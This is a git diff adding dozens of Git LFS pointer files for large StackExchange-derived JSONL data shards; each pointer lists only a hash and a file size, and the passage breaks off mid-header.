0000000000000000000000000000000000000000..df7c05d94d2c96226711d422260697beac0a814c --- /dev/null +++ b/data/stackexchange/1-1/692_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f769337b3442470dc3384c3aa678b6b8a416a0dd9c42cffb760e65278ea1383f +size 37119382 diff --git a/data/stackexchange/1-1/693_2289.jsonl b/data/stackexchange/1-1/693_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e9583140b643afbb5da3ae48e9b89c45080e1835 --- /dev/null +++ b/data/stackexchange/1-1/693_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7dd394c2821aa5ca704be640f5485bdf62fba1b031037d20b07562392e08f310 +size 37087948 diff --git a/data/stackexchange/1-1/694_2289.jsonl b/data/stackexchange/1-1/694_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..54677c95ee04ef9d01df9282c45185ca6ea0a41a --- /dev/null +++ b/data/stackexchange/1-1/694_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83efd1fa76e33dec3182e9be703db834bdd01c35def5cf06e7908d703ea5cdad +size 36961478 diff --git a/data/stackexchange/1-1/695_2289.jsonl b/data/stackexchange/1-1/695_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eff15e2687cab95f9d8f6e155b39649ff4e20c27 --- /dev/null +++ b/data/stackexchange/1-1/695_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:994aabd3ccd847f5dca937326cf9c9a719db631197772f903f7d97b4e7461f7c +size 36887898 diff --git a/data/stackexchange/1-1/696_2289.jsonl b/data/stackexchange/1-1/696_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2c4e5077f1a4c5893dacc52eaf327f2d5b082987 --- /dev/null +++ b/data/stackexchange/1-1/696_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7b4207023d36e3fe933695f911fb0ce5c551743828c55048345ede353d70abe5 +size 36723563 diff --git a/data/stackexchange/1-1/697_2289.jsonl b/data/stackexchange/1-1/697_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..96fbee85aa053a95616e77bf3d87a34b9b037027 --- /dev/null +++ b/data/stackexchange/1-1/697_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cac2670be225f69bda93a68fd6d4eb01f0b1f4f5a1f7732a52e81d173882a242 +size 37399058 diff --git a/data/stackexchange/1-1/698_2289.jsonl b/data/stackexchange/1-1/698_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2a43fbc0b3f5798c265cbc7a5e07d8d4d63e5b4d --- /dev/null +++ b/data/stackexchange/1-1/698_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1b500e6d173d680453e12a0eeb6e07b9010164508f6ee5a5fed5bed00aa019a +size 36711788 diff --git a/data/stackexchange/1-1/699_2289.jsonl b/data/stackexchange/1-1/699_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aed41b43fcf9eaab06c0f09144ba0ea565944f94 --- /dev/null +++ b/data/stackexchange/1-1/699_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a1d67fdc5d3a62f686343f77096fcf796127b91a9a43ac1060974e9d1056e9f +size 37521459 diff --git a/data/stackexchange/1-1/69_2289.jsonl b/data/stackexchange/1-1/69_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a9ec1e3f5593a82f2567ba7fe322a98bd56f1378 --- /dev/null +++ b/data/stackexchange/1-1/69_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:58b4d5b1112f1d2f0887789afa04fcc9eaa2d0d402e6eb9a9abba4dee30a9b43 +size 40093528 diff --git a/data/stackexchange/1-1/6_2289.jsonl b/data/stackexchange/1-1/6_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..21819946a1b8006870230195db1fabab86ab2cd0 --- /dev/null +++ b/data/stackexchange/1-1/6_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6ec4f7c87020207b73a3cba39db234df47ae7544a0ddfdfc5d8107d2494fe009 +size 36056270 diff --git a/data/stackexchange/1-1/700_2289.jsonl b/data/stackexchange/1-1/700_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6e9ad524dbecbd734aa53cd55f7bbde104989760 --- /dev/null +++ b/data/stackexchange/1-1/700_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d4fdc5cc4d5057d8a43a1a729947fe5dbdd91371d81ad495865c77b7db5ac060 +size 36334012 diff --git a/data/stackexchange/1-1/701_2289.jsonl b/data/stackexchange/1-1/701_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ba367942faf8db96fc69931f3ea419440319ff9f --- /dev/null +++ b/data/stackexchange/1-1/701_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:abb6148ab38dca08b8c808b2723bf6e267df37e0c79cbf7cba7b52c37adf0dc1 +size 35882700 diff --git a/data/stackexchange/1-1/702_2289.jsonl b/data/stackexchange/1-1/702_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ed468b0dcfad1166b05628c392b2e0255503252b --- /dev/null +++ b/data/stackexchange/1-1/702_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:097fcf602a82924564afb90ebef19aa00fb58af1f9da64dfe812f27079f273c6 +size 36843397 diff --git a/data/stackexchange/1-1/703_2289.jsonl b/data/stackexchange/1-1/703_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..586d7c13538a18cba93046eb43141722bbe49f8f --- /dev/null +++ b/data/stackexchange/1-1/703_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:06c927477f68bb77a36c2fd82666a29683947610c1e7fef9428c5c469c5c5d43 +size 36777826 diff --git a/data/stackexchange/1-1/704_2289.jsonl b/data/stackexchange/1-1/704_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..782fedacc16c70ad77b70e661dd0f93b5d3cad0d --- /dev/null +++ b/data/stackexchange/1-1/704_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9f079ded33e1c45986b7462ea0e8752b0c2e66bb1dba6dd700cc65c92f6b3a3e +size 36214206 diff --git a/data/stackexchange/1-1/705_2289.jsonl b/data/stackexchange/1-1/705_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bbf66979265ef5183184951388169bb643b3b7d5 --- /dev/null +++ b/data/stackexchange/1-1/705_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:abd9606cf5feaad8eda1e57b4b39da206a94aad6232279265377ea444f8cb1c4 +size 36184870 diff --git a/data/stackexchange/1-1/706_2289.jsonl b/data/stackexchange/1-1/706_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6dc280c9dc696fa58fe772fb1c265317ae41a854 --- /dev/null +++ b/data/stackexchange/1-1/706_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b26b13f1731bfb5694fa3294203c5d2abf233dee831eac08cab94406ad93d2a8 +size 36660505 diff --git a/data/stackexchange/1-1/707_2289.jsonl b/data/stackexchange/1-1/707_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..c62f37cf0eee649a94f83f59fd333a19597f23be --- /dev/null +++ b/data/stackexchange/1-1/707_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:095c67482d52899aa76ab31e2ca7179c88a94d1efecaf603b2f60090dcbd9762 +size 37316903 diff --git a/data/stackexchange/1-1/708_2289.jsonl b/data/stackexchange/1-1/708_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3c063b5b898ff108681360326715db8d90a8bb8b --- /dev/null +++ b/data/stackexchange/1-1/708_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6242c1b0d8d43fbefe43a55e456ad4afaa3881a46d9b33572f3c2824d20f6f5f +size 36138682 diff --git a/data/stackexchange/1-1/709_2289.jsonl b/data/stackexchange/1-1/709_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6c24476d0a6b8c34153f1c1b7f973fdedbacd867 --- /dev/null +++ b/data/stackexchange/1-1/709_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e6942039d1f0569e05d483f1a8f20b26b207a81b9affc3390cb3bf6d42da75c7 +size 36307705 diff --git a/data/stackexchange/1-1/70_2289.jsonl b/data/stackexchange/1-1/70_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..98a75e410248fff8e74c66d04ba255db2be132a7 --- /dev/null +++ b/data/stackexchange/1-1/70_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:04ab040237658ad3f8d11c1213e65a31272c7457e360d4522132a94fd4075bca +size 39836999 diff --git a/data/stackexchange/1-1/710_2289.jsonl b/data/stackexchange/1-1/710_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f73264f7202c7ec052c5f39311dd2dfbc2774db6 --- /dev/null +++ b/data/stackexchange/1-1/710_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5fa6e1ba92cb4fd6fdb050b8b787c370249426ffe35f5e0bc6733948d26b0e05 +size 36111428 diff --git a/data/stackexchange/1-1/711_2289.jsonl b/data/stackexchange/1-1/711_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0edb45b3de22632683cc28286234bd311e0531f --- /dev/null +++ b/data/stackexchange/1-1/711_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9012dd437d2ea6422a690ccd8d936c19dc3fca88a44cc568eadf7299452a13b1 +size 36384138 diff --git a/data/stackexchange/1-1/712_2289.jsonl b/data/stackexchange/1-1/712_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83338323cb4ceaa40f525a5a5de2e7a6dd953856 --- /dev/null +++ b/data/stackexchange/1-1/712_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30d96ede266483f3c38baaaf3c86db7e26a7f0ba8bd3341ace506f5cf5bb33e2 +size 37093705 diff --git a/data/stackexchange/1-1/713_2289.jsonl b/data/stackexchange/1-1/713_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c8a91f890ac4ba77c299d9091286b7ba7a764d76 --- /dev/null +++ b/data/stackexchange/1-1/713_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51c44c18224456b99b6534e39bb122409e5427e487035a1695b4765d30046c27 +size 36457524 diff --git a/data/stackexchange/1-1/714_2289.jsonl b/data/stackexchange/1-1/714_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..72b95765947f3176839fc5181771753b04de7678 --- /dev/null +++ b/data/stackexchange/1-1/714_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:c6ee39b1944e5d13e15bc857d94fe46dc0185401b6dd4bfc8fb1debf4765e07d +size 36464177 diff --git a/data/stackexchange/1-1/715_2289.jsonl b/data/stackexchange/1-1/715_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6c8288d9b03264f331a6cf3b3aac9cc40c54f22d --- /dev/null +++ b/data/stackexchange/1-1/715_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:532fa8c93aba9ac1c67d7c9edb0c7a26a9335f20c590bd53f8d7eca024e89979 +size 36607546 diff --git a/data/stackexchange/1-1/716_2289.jsonl b/data/stackexchange/1-1/716_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..76cb5cb5b3e1c1e74b9a238794f69c1200152982 --- /dev/null +++ b/data/stackexchange/1-1/716_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41752ccf3c40ed1f49e6fb10817225d23b21c5f85cf66672451ebe32b9c210e2 +size 36272628 diff --git a/data/stackexchange/1-1/717_2289.jsonl b/data/stackexchange/1-1/717_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..56b877bf657461954e7474f04049cc09707d82d6 --- /dev/null +++ b/data/stackexchange/1-1/717_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5e228c2214226c412047cf6a5b2726ce555e00206604603289b8bb332ae1aac +size 36644535 diff --git a/data/stackexchange/1-1/718_2289.jsonl b/data/stackexchange/1-1/718_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..67a94fa6d429a8778b29d7d017bbe48844f05794 --- /dev/null +++ b/data/stackexchange/1-1/718_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e8e1eb2ec9291a763ab3ad543427c09c38ccaad1420b8f17bb0dcfe9b02d1f9 +size 36573452 diff --git a/data/stackexchange/1-1/719_2289.jsonl b/data/stackexchange/1-1/719_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f62b733a1a5c599986cadae12773c84a89294b4e --- /dev/null +++ b/data/stackexchange/1-1/719_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:68eb75ba0678e4d1803e8c3ba1d55b2b1e5776f744c7c967d9405bf4b41011d9 +size 36303555 diff --git a/data/stackexchange/1-1/71_2289.jsonl b/data/stackexchange/1-1/71_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..317c51cb4aebbb5c00f251e46d3bfd3ce7395c8e --- /dev/null +++ b/data/stackexchange/1-1/71_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:97ea4fe56422b42843fc7bcc2b8586c758b5b8b23b5e20b1dce58eaa524d1175 +size 39294819 diff --git a/data/stackexchange/1-1/720_2289.jsonl b/data/stackexchange/1-1/720_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..68b735925404c6b6c4374643cbb13d099a01a63c --- /dev/null +++ b/data/stackexchange/1-1/720_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a4f20241abcc8f66b03ad8f1e9e1053dc9be018d555cc629f59a01d9a6660af +size 36126227 diff --git a/data/stackexchange/1-1/721_2289.jsonl b/data/stackexchange/1-1/721_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0fd13ad5139ab4c572453db7b445c72bc226edff --- /dev/null +++ b/data/stackexchange/1-1/721_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2733e994c0c750ffd80a20e8b5f4ff177f1568d4de7729380a32ef921d5ab669 +size 36295798 diff --git a/data/stackexchange/1-1/722_2289.jsonl b/data/stackexchange/1-1/722_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..fe45e9600c49e0480596381640531c074a3e97d4 --- /dev/null +++ b/data/stackexchange/1-1/722_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b4d65e7095fd7b6fa0c3ca31e567431c1a61ea558d4f29091e2a2b4acfafa70 +size 36856746 diff --git a/data/stackexchange/1-1/723_2289.jsonl b/data/stackexchange/1-1/723_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c9f7606a4240188db891b00f82d197c234cbd3e1 --- /dev/null +++ b/data/stackexchange/1-1/723_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce2e353263a8266f672b52ff0405b293cbfb204eb2ab306c071049572b41b2e5 +size 36594203 diff --git a/data/stackexchange/1-1/724_2289.jsonl b/data/stackexchange/1-1/724_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..28167b71ae805b29bc65c3d9087e7805c511c75f --- /dev/null +++ b/data/stackexchange/1-1/724_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:607f3f9c5a23cfe1cfc0ff2d320ed7f63d304d9b1fc8147d647c36d5f3f8aa77 +size 36746338 diff --git a/data/stackexchange/1-1/725_2289.jsonl b/data/stackexchange/1-1/725_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7a78b9f9b249d97485e71d7b6a5e8234e735ccb8 --- /dev/null +++ b/data/stackexchange/1-1/725_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:45eaec6ca50faad7207002f48506ee54b6bbf82c8ff9e456226b532540074f04 +size 37122353 diff --git a/data/stackexchange/1-1/726_2289.jsonl b/data/stackexchange/1-1/726_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6965777f31b9610b7846c2cdbb9124c5995d9ab5 --- /dev/null +++ b/data/stackexchange/1-1/726_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cb1db3b8b694263b8c7cf547f3f7b279ea2ed06c76fd977e8f227b9a45024dcc +size 36363978 diff --git a/data/stackexchange/1-1/727_2289.jsonl b/data/stackexchange/1-1/727_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0066dde1e705687346577592b016599ea6680fab --- /dev/null +++ b/data/stackexchange/1-1/727_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e49bab8155ca056a892cd41c91e249233a64f5c249abccfe25de1b900f7da776 +size 35723811 diff --git a/data/stackexchange/1-1/728_2289.jsonl b/data/stackexchange/1-1/728_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d64357b6ce00730cdb5036fcf6fe284b00dfe55e --- /dev/null +++ b/data/stackexchange/1-1/728_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cdec25cd5f357101d79ffd238533b7e25036efdbe4a56e12bf887d48cdf958e7 +size 36013248 diff --git a/data/stackexchange/1-1/729_2289.jsonl b/data/stackexchange/1-1/729_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fe0027bcbf1a004fb9663cff828539547a8e3a28 --- /dev/null +++ b/data/stackexchange/1-1/729_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5649f5fd37924c1f455406844d9b1602409b88338fdd913d70059d9fd4e5cb96 +size 36584394 diff --git a/data/stackexchange/1-1/72_2289.jsonl b/data/stackexchange/1-1/72_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..261998f5a3af31b6c2ccec3e7813eff81166a55a --- /dev/null +++ b/data/stackexchange/1-1/72_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:3ab9d0aa900a43cda44bb5ae69a3513b74529be1a35b16f3a05e59147b1b8781 +size 40546531 diff --git a/data/stackexchange/1-1/730_2289.jsonl b/data/stackexchange/1-1/730_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c230ebf87e7c24574fc8e4a0cf1ace612bffb78f --- /dev/null +++ b/data/stackexchange/1-1/730_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9405bb818150b94e372edf0e0e1126619365c36b6d657e399e0586134f1398be +size 36382149 diff --git a/data/stackexchange/1-1/731_2289.jsonl b/data/stackexchange/1-1/731_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e33fa0c84ef4556a2998812b9b25cbae4f0c69b0 --- /dev/null +++ b/data/stackexchange/1-1/731_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5955a7f19583b83a0b9fb99df23f5b64b907b49af18275e5dddfa90e76c3cc6f +size 36417903 diff --git a/data/stackexchange/1-1/732_2289.jsonl b/data/stackexchange/1-1/732_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7c7d6e10a6d924a96f5cd98b67daced3b130a16f --- /dev/null +++ b/data/stackexchange/1-1/732_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9a9e05a5ad8a12ed645bd6d7217a05316ac5a31c34e54a057e3c70b8139bfdc8 +size 36437642 diff --git a/data/stackexchange/1-1/733_2289.jsonl b/data/stackexchange/1-1/733_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..932a22bfcc3d591a1dceec92d41ff96f1ee36576 --- /dev/null +++ b/data/stackexchange/1-1/733_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a846d500cddc424c380a13807b764aba17c3bc73dba00df310278677650bd5e +size 36634800 diff --git a/data/stackexchange/1-1/734_2289.jsonl b/data/stackexchange/1-1/734_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..64d0adb44bb2ef068ef9b801a2a9c50be1b72f3b --- /dev/null +++ b/data/stackexchange/1-1/734_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fdcfd3a831102e936a01eecee41183e5a89ce81b34ed8ca50484f50fc25cd774 +size 36506186 diff --git a/data/stackexchange/1-1/735_2289.jsonl b/data/stackexchange/1-1/735_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b04fc688e025d8ca29ad71e994b801aff9168e3d --- /dev/null +++ b/data/stackexchange/1-1/735_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b4ac683b6ba26d10d118e39e8326ea641fdb13a31e8673968e9682bcdb4eea5a +size 36339580 diff --git a/data/stackexchange/1-1/736_2289.jsonl b/data/stackexchange/1-1/736_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0ae84420d66b27d423e78739518e98600806b6da --- /dev/null +++ b/data/stackexchange/1-1/736_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72f967fc8d8d13d2dbbd7e885206a3b4087768555755a3cc779c4f207ab9fefa +size 36802507 diff --git a/data/stackexchange/1-1/737_2289.jsonl b/data/stackexchange/1-1/737_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..48eac24c78c9cfc459d3c6dd0af5594ed7888871 --- /dev/null +++ b/data/stackexchange/1-1/737_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b609c8cc7bd995f2b0a9c6660a1d2f316f6ab52b14aa704033c6d52167525692 +size 36282621 diff --git a/data/stackexchange/1-1/738_2289.jsonl b/data/stackexchange/1-1/738_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..eda9f03ae220895e86441c5c4405666b9d42e6b4 --- /dev/null +++ b/data/stackexchange/1-1/738_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1e7549f21a164c3ebe823c6fc0d18670321e4f6b2f1725281dd604f79c57f8c +size 37024173 diff --git a/data/stackexchange/1-1/739_2289.jsonl b/data/stackexchange/1-1/739_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..01099e7b7a80e439487b199185f0c2941146e22c --- /dev/null +++ b/data/stackexchange/1-1/739_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d41a0b1941d2ee4690fa600cd9936a686a1f8f7c23decb57ddaac46652407e42 +size 36606563 diff --git a/data/stackexchange/1-1/73_2289.jsonl b/data/stackexchange/1-1/73_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..41836d5a50a2bb1c6afc2eec0cecb6fd5b6b432b --- /dev/null +++ b/data/stackexchange/1-1/73_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9418239eec600be8ed83c70930f7f951f013d97e4d53166a91261c7555e3b012 +size 39938043 diff --git a/data/stackexchange/1-1/740_2289.jsonl b/data/stackexchange/1-1/740_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2351d250d06e6ed7a3a9b69817add0aa4b007da7 --- /dev/null +++ b/data/stackexchange/1-1/740_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5222119a1d33ef867bcc380e8d739f139b01f3d3f6699cc86f8a048f837259e +size 36981923 diff --git a/data/stackexchange/1-1/741_2289.jsonl b/data/stackexchange/1-1/741_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9a31646b98302e85bc6d454106bc1c6b863fe3a5 --- /dev/null +++ b/data/stackexchange/1-1/741_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6686ff69a1f66c58d5d9b34871738d75c056a3e84795d3d77798e203639e47dc +size 36882445 diff --git a/data/stackexchange/1-1/742_2289.jsonl b/data/stackexchange/1-1/742_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91f2558ee85140d56675c9d9d8dad333dade37f9 --- /dev/null +++ b/data/stackexchange/1-1/742_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c699fa8a3749cda6f8de7dbd03f8b9141891c11bb031995322486978a5e3d7df +size 36971291 diff --git a/data/stackexchange/1-1/743_2289.jsonl b/data/stackexchange/1-1/743_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..87579ad12cec0a8257ff52fecb2796450cac7f5f --- /dev/null +++ b/data/stackexchange/1-1/743_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1205269d7711657adc9a7f215a26556eae2cdef3d01642b3fb60a9527f4a2058 +size 36527367 diff --git a/data/stackexchange/1-1/744_2289.jsonl b/data/stackexchange/1-1/744_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cf0ad1664337bcbf42ed94aeb935f0ad20cc170e --- /dev/null +++ b/data/stackexchange/1-1/744_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4337d925429fed843ec229f07db081327fdd63ad4c238cffbae41330e44c5da9 +size 36171689 diff --git a/data/stackexchange/1-1/745_2289.jsonl b/data/stackexchange/1-1/745_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..29fe23e4eff28ba6a6967a26eaf87b9775644751 --- /dev/null +++ b/data/stackexchange/1-1/745_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:c26716350687b31dbd70bf5662106afe336534f0a89e8fff719e6590fd45d7dd +size 36815364 diff --git a/data/stackexchange/1-1/746_2289.jsonl b/data/stackexchange/1-1/746_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..23e9dd4734912721acf72423bf2412fd4fb2daae --- /dev/null +++ b/data/stackexchange/1-1/746_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af5a75369f35065cca479d841778598047d9b9d796e696a584e54c5e9fef2d1d +size 36932261 diff --git a/data/stackexchange/1-1/747_2289.jsonl b/data/stackexchange/1-1/747_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9c420634ff505eb9170976267b26799deb9f1b71 --- /dev/null +++ b/data/stackexchange/1-1/747_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9e3283d6eddcaae7cd2d86bf4c93d4709a181e06fb21b9f94e90d8d41a67ca7c +size 36693890 diff --git a/data/stackexchange/1-1/748_2289.jsonl b/data/stackexchange/1-1/748_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca647110102095c020b99f99300f9c1e46b84aa7 --- /dev/null +++ b/data/stackexchange/1-1/748_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f71b5af0ad8da8a7180e3a495e823fbcad711fcf04842d2b3725ad2771f01ba +size 36147884 diff --git a/data/stackexchange/1-1/749_2289.jsonl b/data/stackexchange/1-1/749_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..baf364785f78b0f765bc12f546967cba5d8f9851 --- /dev/null +++ b/data/stackexchange/1-1/749_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b965b7068759b79152aa6a247d9582e3bf8a195736d150690dc2635bbac7aba +size 36400897 diff --git a/data/stackexchange/1-1/74_2289.jsonl b/data/stackexchange/1-1/74_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..106e51a3b9403717b6c5893a63b5e8955dcdac0c --- /dev/null +++ b/data/stackexchange/1-1/74_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6b346dccbc8e22bbc6d6122062786227d7719e87cb8cb915d9218439ce666d9 +size 39348373 diff --git a/data/stackexchange/1-1/750_2289.jsonl b/data/stackexchange/1-1/750_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..346151e9b508b693df0f7173a160f2a9ddff9336 --- /dev/null +++ b/data/stackexchange/1-1/750_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2ef371911ef35ddfebfb8d1b2f267e961cd91f473f03e251ec5ecde9fca91776 +size 36456161 diff --git a/data/stackexchange/1-1/751_2289.jsonl b/data/stackexchange/1-1/751_2289.jsonl new file 